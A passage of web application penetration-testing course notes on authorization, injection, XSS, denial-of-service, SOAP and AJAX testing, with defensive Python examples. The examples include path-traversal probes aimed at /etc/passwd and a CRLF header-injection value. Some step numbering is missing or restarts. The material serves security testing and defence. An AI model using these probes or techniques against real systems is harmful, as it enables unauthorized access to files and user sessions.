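    """Combine the checks; an empty list means the exchange passed."""
    findings = cookie_findings(post_login)
    fixation = fixation_finding(pre_login, post_login)
    if fixation:
        findings.append(fixation)
    return findings


if __name__ == "__main__":
    for label, header in (("bad", POST_LOGIN_SET_COOKIE_BAD), ("good", POST_LOGIN_SET_COOKIE_GOOD)):
        print(label, audit(PRE_LOGIN_SET_COOKIE, header) or ["no findings"])
```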
Authorization Testing
- Test for path traversal by performing input vector enumeration and analyzing the input validation functions present in the web application: can gain access to reserved information
- Test for bypassing authorization schema by examining the admin functionalities, to gain access to the resources assigned to a different role
Follow the steps here to test the web application against authorization vulnerabilities:
Step 1: Test for path traversal
Test for path traversal by performing input vector enumeration and analyzing the input validation functions present in the web application. Path traversal allows attackers to gain access to reserved information.
Step 2: Test for bypassing authorization schema
Step 3: Test for privilege escalation
Test for role/privilege manipulation. If the attacker has access to resources/functionality, then he or she can perform a privilege escalation attack.
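As an added example (not the module's code), the following Python shows the kind of input validation function Step 1 tells you to analyze: a weak resolver that joins the user-supplied path with no canonicalization beside a hardened one that decodes, normalizes and checks containment under a placeholder web root, exercised with a few constructed probe inputs.

```python
import posixpath
from urllib.parse import unquote

WEB_ROOT = "/var/www/app/files"   # placeholder document root, constructed for the demo


def resolve_weak(user_path):
    """Weak: joins the user path under the root with no canonicalization and no
    containment check, so '../' segments (or an absolute path) walk out of WEB_ROOT."""
    return posixpath.join(WEB_ROOT, user_path)


def resolve_hardened(user_path):
    """Hardened: decode, normalize, then require the result to stay under WEB_ROOT.
    Returns None when the request would leave the document root."""
    decoded = unquote(user_path)
    if "\x00" in decoded:                          # NUL would truncate the path in C code
        return None
    full = posixpath.normpath(posixpath.join(WEB_ROOT, decoded.lstrip("/")))
    if full != WEB_ROOT and not full.startswith(WEB_ROOT + "/"):
        return None                                # escaped the root: reject
    return full


def escapes_root(path):
    """Tester's view: does the OS-level resolution of `path` leave WEB_ROOT?"""
    full = posixpath.normpath(path)
    return not (full == WEB_ROOT or full.startswith(WEB_ROOT + "/"))


if __name__ == "__main__":
    # Constructed probes: a normal file, a dotted-segment probe and its URL-encoded form.
    for probe in ("reports/q1.pdf", "../../etc/passwd", "%2e%2e/%2e%2e/etc/passwd"):
        print(f"{probe!r:32} weak escapes={escapes_root(resolve_weak(probe))} "
              f"hardened={resolve_hardened(probe)}")
```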
Data Validation Testing
- Test for reflected cross-site scripting: Detect and analyze input vectors for potential vulnerabilities, analyze the vulnerability report and attempt to exploit it. Use tools such as OWASP CAL9000, WebScarab, XSS-Proxy, ratproxy, and Burp Proxy
- Test for stored cross-site scripting: Analyze HTML code, test for Stored XSS, leverage Stored XSS, verify if the file upload allows setting arbitrary MIME types using tools such as OWASP CAL9000, Hackvertor, BeEF, XSS-Proxy, Backframe, WebScarab, Burp, and XSS Assistant
- Test for DOM-based cross-site scripting: Perform source code analysis to identify JavaScript coding errors
- Test for cross site flashing: Analyze SWF files using tools such as SWFIntruder, Decompiler - Flare, Compiler - MTASC, Disassembler - Flasm, Swfmill, and Debugger Version of Flash Plugin/Player
- Perform SQL injection testing: Perform Standard SQL Injection Testing, Union Query SQL Injection Testing, Blind SQL Injection Testing, and Stored Procedure Injection using tools such as OWASP SQLiX, sqlninja, SqlDumper, sqlbftools, SQLPower Injector, etc.
- Perform LDAP injection testing: Use a trial and error approach by inserting '(', '|', and the other characters in order to check the application for errors. Use the tool Softerra LDAP Browser
Outcomes noted in the flow: session cookie information; sensitive information such as session authorization tokens; information on DOM-based cross-site scripting vulnerabilities; cookie information; sensitive information about users and hosts
Step 1: Test for reflected cross-site scripting
A reflected cross-site scripting attacker crafts a URL to exploit the reflected XSS vulnerability and sends it to the client in a spam mail. If the victim clicks on the link, considering it as from a trusted server, the malicious script embedded by the attacker in the URL gets executed on the victim's browser and sends the victim's session cookie to the attacker. Using this session cookie, the attacker can steal the sensitive information of the victim. Hence, to avoid this kind of attack you must check your web applications against reflected XSS attacks. If you put proper data validation mechanisms or methods in place, then you can easily determine whether the URL originally came from the server or was crafted by the attacker. Detect and analyze input vectors for potential vulnerabilities, analyze the vulnerability report, and attempt to exploit it. Use tools such as OWASP CAL9000, Hackvertor, BeEF, XSS-Proxy, Backframe, WebScarab, XSS Assistant, and Burp Proxy.
Step 2: Test for stored cross-site scripting
Analyze HTML code, test for Stored XSS, leverage Stored XSS, and verify if the file upload allows setting arbitrary MIME types using tools such as OWASP CAL9000, Hackvertor, BeEF, XSS-Proxy, Backframe, WebScarab, Burp, and XSS Assistant. Stored XSS attacks allow attackers to uncover sensitive information such as session authorization tokens.
Step 3: Test for DOM-based cross-site scripting
Step 4: Test for cross site flashing
Step 5: Perform SQL injection testing
Step 6: Perform LDAP injection testing
Perform ORM injection testing: discover vulnerabilities of an ORM tool and test web applications that use ORM. Use tools such as Hibernate, Nhibernate, and Ruby On Rails. May reveal information on SQL injection vulnerability
Perform XML injection testing: try to insert XML metacharacters. May reveal information about XML structure
Perform SSI injection testing: find if the web server actually supports SSI directives using tools such as Web Proxy Burp Suite, OWASP ZAP, WebScarab, String searcher: grep. May reveal web server CGI environment variables
Perform XPath injection testing: inject XPath code and interfere with the query result
Perform IMAP/SMTP injection testing: identify vulnerable parameters. Understand the data flow and deployment structure of the client, and perform IMAP/SMTP command injection. May give access to confidential information
Step 7: Perform ORM injection testing
Perform ORM injection testing to discover vulnerabilities of an ORM tool and test web applications that use ORM. Use tools such as Hibernate, Nhibernate, and Ruby On Rails. This test gives information on SQL injection vulnerabilities.
Step 8: Perform XML injection testing
To perform XML injection testing, try to insert XML metacharacters and observe the response. A successful XML injection may give information about XML structure.
Step 9: Perform SSI injection testing
Perform SSI injection testing and find if the web server actually supports SSI directives using tools such as Web Proxy Burp Suite, Paros, WebScarab, String searcher: grep. If the attacker can inject SSI implementations, then he or she can set or print web server CGI environment variables.
Step 10: Perform XPath injection testing
Step 11: Perform IMAP/SMTP injection testing
Step 13: Perform OS commanding
Perform manual code analysis and craft malicious HTTP requests using | to test for OS command injection attacks. OS commanding may reveal local data and system information.
Step 14: Perform buffer overflow testing
Step 15: Perform incubated vulnerability testing
Upload a file that exploits a component in the local user workstation; when viewed or downloaded by the user, perform XSS and SQL injection attacks. Incubated vulnerabilities may give information about server configuration and input validation schemes to the attackers.
Step 16: Test for HTTP splitting/smuggling
Identify all user-controlled input that influences one or more headers in the response and check whether he or she can successfully inject a CR+LF sequence in it. Attackers perform HTTP splitting/smuggling to get cookies and HTTP redirect information.
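The check behind Step 16, written from the server side as an added example (hypothetical code, not part of the CEH notes): any user-controlled value copied into a response header is percent-decoded and refused if it carries a CR or LF. The decode depth of 3 and the sample values are assumptions.

```python
from urllib.parse import unquote

MAX_DECODE_LAYERS = 3  # assumption: the application never decodes input more than this

def decode_layers(value: str) -> str:
    """Percent-decode repeatedly so that double-encoded %250d%250a is also seen as CR LF."""
    for _ in range(MAX_DECODE_LAYERS):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def contains_crlf(value: str) -> bool:
    """True when the value, after decoding, carries a CR or LF that would end a header line."""
    return any(ch in "\r\n" for ch in decode_layers(value))

def render_headers(headers: list) -> bytes:
    """Serialize a header list, refusing any name or value that would start a new header line."""
    lines = []
    for name, value in headers:
        if contains_crlf(name) or contains_crlf(value):
            raise ValueError(f"header {name!r} carries CR/LF; refusing to emit it")
        lines.append(f"{name}: {value}")
    return ("\r\n".join(lines) + "\r\n\r\n").encode("ascii")

def redirect_is_rejected(location: str) -> bool:
    """Test helper: does the guard refuse a Location header built from this value?"""
    try:
        render_headers([("Location", location), ("Content-Length", "0")])
    except ValueError:
        return True
    return False

# Constructed sample inputs: a normal redirect target and one carrying an encoded CR LF
if __name__ == "__main__":
    for sample in ("/account/home", "/account/home%0d%0aX-Injected:%201"):
        print(sample, "rejected" if redirect_is_rejected(sample) else "accepted")
```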
Step 1: Test for SQL wildcard attacks
Find where the numbers submitted as a name/value pair might be used by the application code and attempt to set the value to an extremely large numeric value, and then see if the server continues to respond. If the attacker knows the maximum number of objects that the application can handle, he or she can exploit the application by sending objects beyond the maximum limit.
Denial-of-Service Testing (Cont'd)
Test for user input as a loop counter and enter an extremely large number in the input field that is used by the application as a loop counter. If the application fails to exhibit its predefined manner, it means that the application contains a logical error.
Use a script to automatically submit an extremely long value to the server in the request that is being logged.
Identify and send a large number of requests that perform database operations and observe any slowdown or new error messages.
Step 8: Test for storing too much data in session
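Server-side guards for the four denial-of-service checks above (loop counter, long logged values, repeated database requests, session growth), as an added example rather than code from the CEH notes. The limits and the sliding-window limiter are assumptions chosen for illustration.

```python
import time
from collections import deque

MAX_LOOP_COUNT = 1000       # assumption: most iterations any handler legitimately needs
MAX_LOGGED_LENGTH = 256     # assumption: longest request field worth writing to the log
MAX_SESSION_BYTES = 4096    # assumption: cap on the data a single session may hold

def parse_loop_count(raw: str) -> int:
    """Bound a user-supplied count before it is used as a loop counter."""
    if not raw.isdigit() or len(raw) > 6:    # rejects signs, spaces and very long digit strings
        raise ValueError("count must be a short unsigned integer")
    count = int(raw)
    if count > MAX_LOOP_COUNT:
        raise ValueError(f"count {count} exceeds limit {MAX_LOOP_COUNT}")
    return count

def loop_count_rejected(raw: str) -> bool:
    """Test helper: True when the guard refuses the value."""
    try:
        parse_loop_count(raw)
    except ValueError:
        return True
    return False

def safe_log_value(raw: str) -> str:
    """Truncate oversized values before logging so one request cannot fill the log."""
    if len(raw) <= MAX_LOGGED_LENGTH:
        return raw
    return raw[:MAX_LOGGED_LENGTH] + f"...[truncated {len(raw) - MAX_LOGGED_LENGTH} chars]"

class DbRateLimiter:
    """Sliding-window cap on database-backed requests per client."""
    def __init__(self, limit: int, window_s: float):
        self.limit, self.window_s = limit, window_s
        self._hits = {}                        # client id -> deque of request timestamps

    def allow(self, client: str, now=None) -> bool:
        now = time.monotonic() if now is None else now
        hits = self._hits.setdefault(client, deque())
        while hits and now - hits[0] >= self.window_s:
            hits.popleft()                     # drop requests that have left the window
        if len(hits) >= self.limit:
            return False
        hits.append(now)
        return True

def session_put(session: dict, key: str, value: str) -> bool:
    """Store into the session only while its total size stays under the cap."""
    other = sum(len(k) + len(v) for k, v in session.items() if k != key)
    if other + len(key) + len(value) > MAX_SESSION_BYTES:
        return False
    session[key] = value
    return True
```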
To gather WS information use tools such as wsChess, Soaplite, CURL, Perl, etc. and online tools such as UDDI Browser, WSIndex, and Xmethods
Use tools such as WSDigger, WebScarab, and Foundstone to automate web services security testing
Pass malformed SOAP messages to the XML parser or attach a very large string to the message. Use WSDigger to perform automated XML structure testing
Craft an XML document (SOAP message) to send to a web service that contains malware as an attachment to check if the XML document has a SOAP attachment vulnerability
Web Services Testing may reveal: information about SQL, XPath, buffer overflow, and command injection vulnerabilities; information about MITM vulnerability; HTTP GET/REST attack vectors; SOAP message information
Test for AJAX: AJAX application call endpoints
Parse the HTML and JavaScript files: XMLHttpRequest object, JavaScript files, AJAX frameworks
Use a proxy to observe traffic: format of application requests
A J A X T e s t i n g
The following are the steps used to carry out AJAX pen testing:
Step 1: Test for AJAX
Enumerate the AJAX call endpoints for the asynchronous calls using tools such as Sprajax.
Step 2: Parse the HTML and JavaScript files
Observe HTML and JavaScript files to find URLs of additional application surface exposure.
Step 3: Use a proxy to observe traffic
Use proxies and sniffers to observe traffic generated by user-viewable pages and the
background asynchronous traffic to the AJAX endpoints in order to determine the format and
destination of the requests.
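Step 2 (parsing HTML and JavaScript for endpoint URLs) carried out in code, as an added example that is not part of the CEH notes: the regexes, the constructed sample page and the example.test host names are assumptions, and the inventory is compared against a documented API list so undocumented surface stands out.

```python
import re
from urllib.parse import urljoin

# Patterns for the common ways client-side code names an endpoint:
# xhr.open("GET", "/api/x"), fetch("/api/y"), $.ajax({url: "/api/z"}), $.get("/api/w"), <script src="...">
ENDPOINT_PATTERNS = [
    re.compile(r"""\.open\(\s*['"][A-Z]+['"]\s*,\s*['"]([^'"]+)['"]"""),
    re.compile(r"""\bfetch\(\s*['"]([^'"]+)['"]"""),
    re.compile(r"""\burl\s*:\s*['"]([^'"]+)['"]"""),
    re.compile(r"""\$\.(?:get|post|getJSON)\(\s*['"]([^'"]+)['"]"""),
    re.compile(r"""<script[^>]+src\s*=\s*['"]([^'"]+)['"]""", re.IGNORECASE),
]

def extract_endpoints(source: str, base_url: str) -> list:
    """Return the sorted, de-duplicated absolute URLs referenced by the given HTML/JS text."""
    found = set()
    for pattern in ENDPOINT_PATTERNS:
        for match in pattern.finditer(source):
            found.add(urljoin(base_url, match.group(1)))   # resolve relative paths against the page
    return sorted(found)

def undocumented(endpoints: list, documented: set) -> list:
    """Endpoints the inventory found that are not in the documented API surface."""
    return [e for e in endpoints if e not in documented]

# Constructed sample page, standing in for a crawled HTML/JS file
SAMPLE_PAGE = """
<script src="/static/app.js"></script>
<script>
  var xhr = new XMLHttpRequest();
  xhr.open("GET", "/api/v1/profile", true);
  fetch("/api/v1/orders?status=open").then(r => r.json());
  $.ajax({ url: "/legacy/export.php", type: "POST" });
  $.getJSON("https://cdn.example.test/config.json");
</script>
"""
```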
Module Summary
With increasing dependence, web applications and web services are increasingly being targeted by various attacks that result in huge revenue loss for the organizations.
It is also observed that most of the vulnerabilities result because of misconfiguration and not following standard security practices.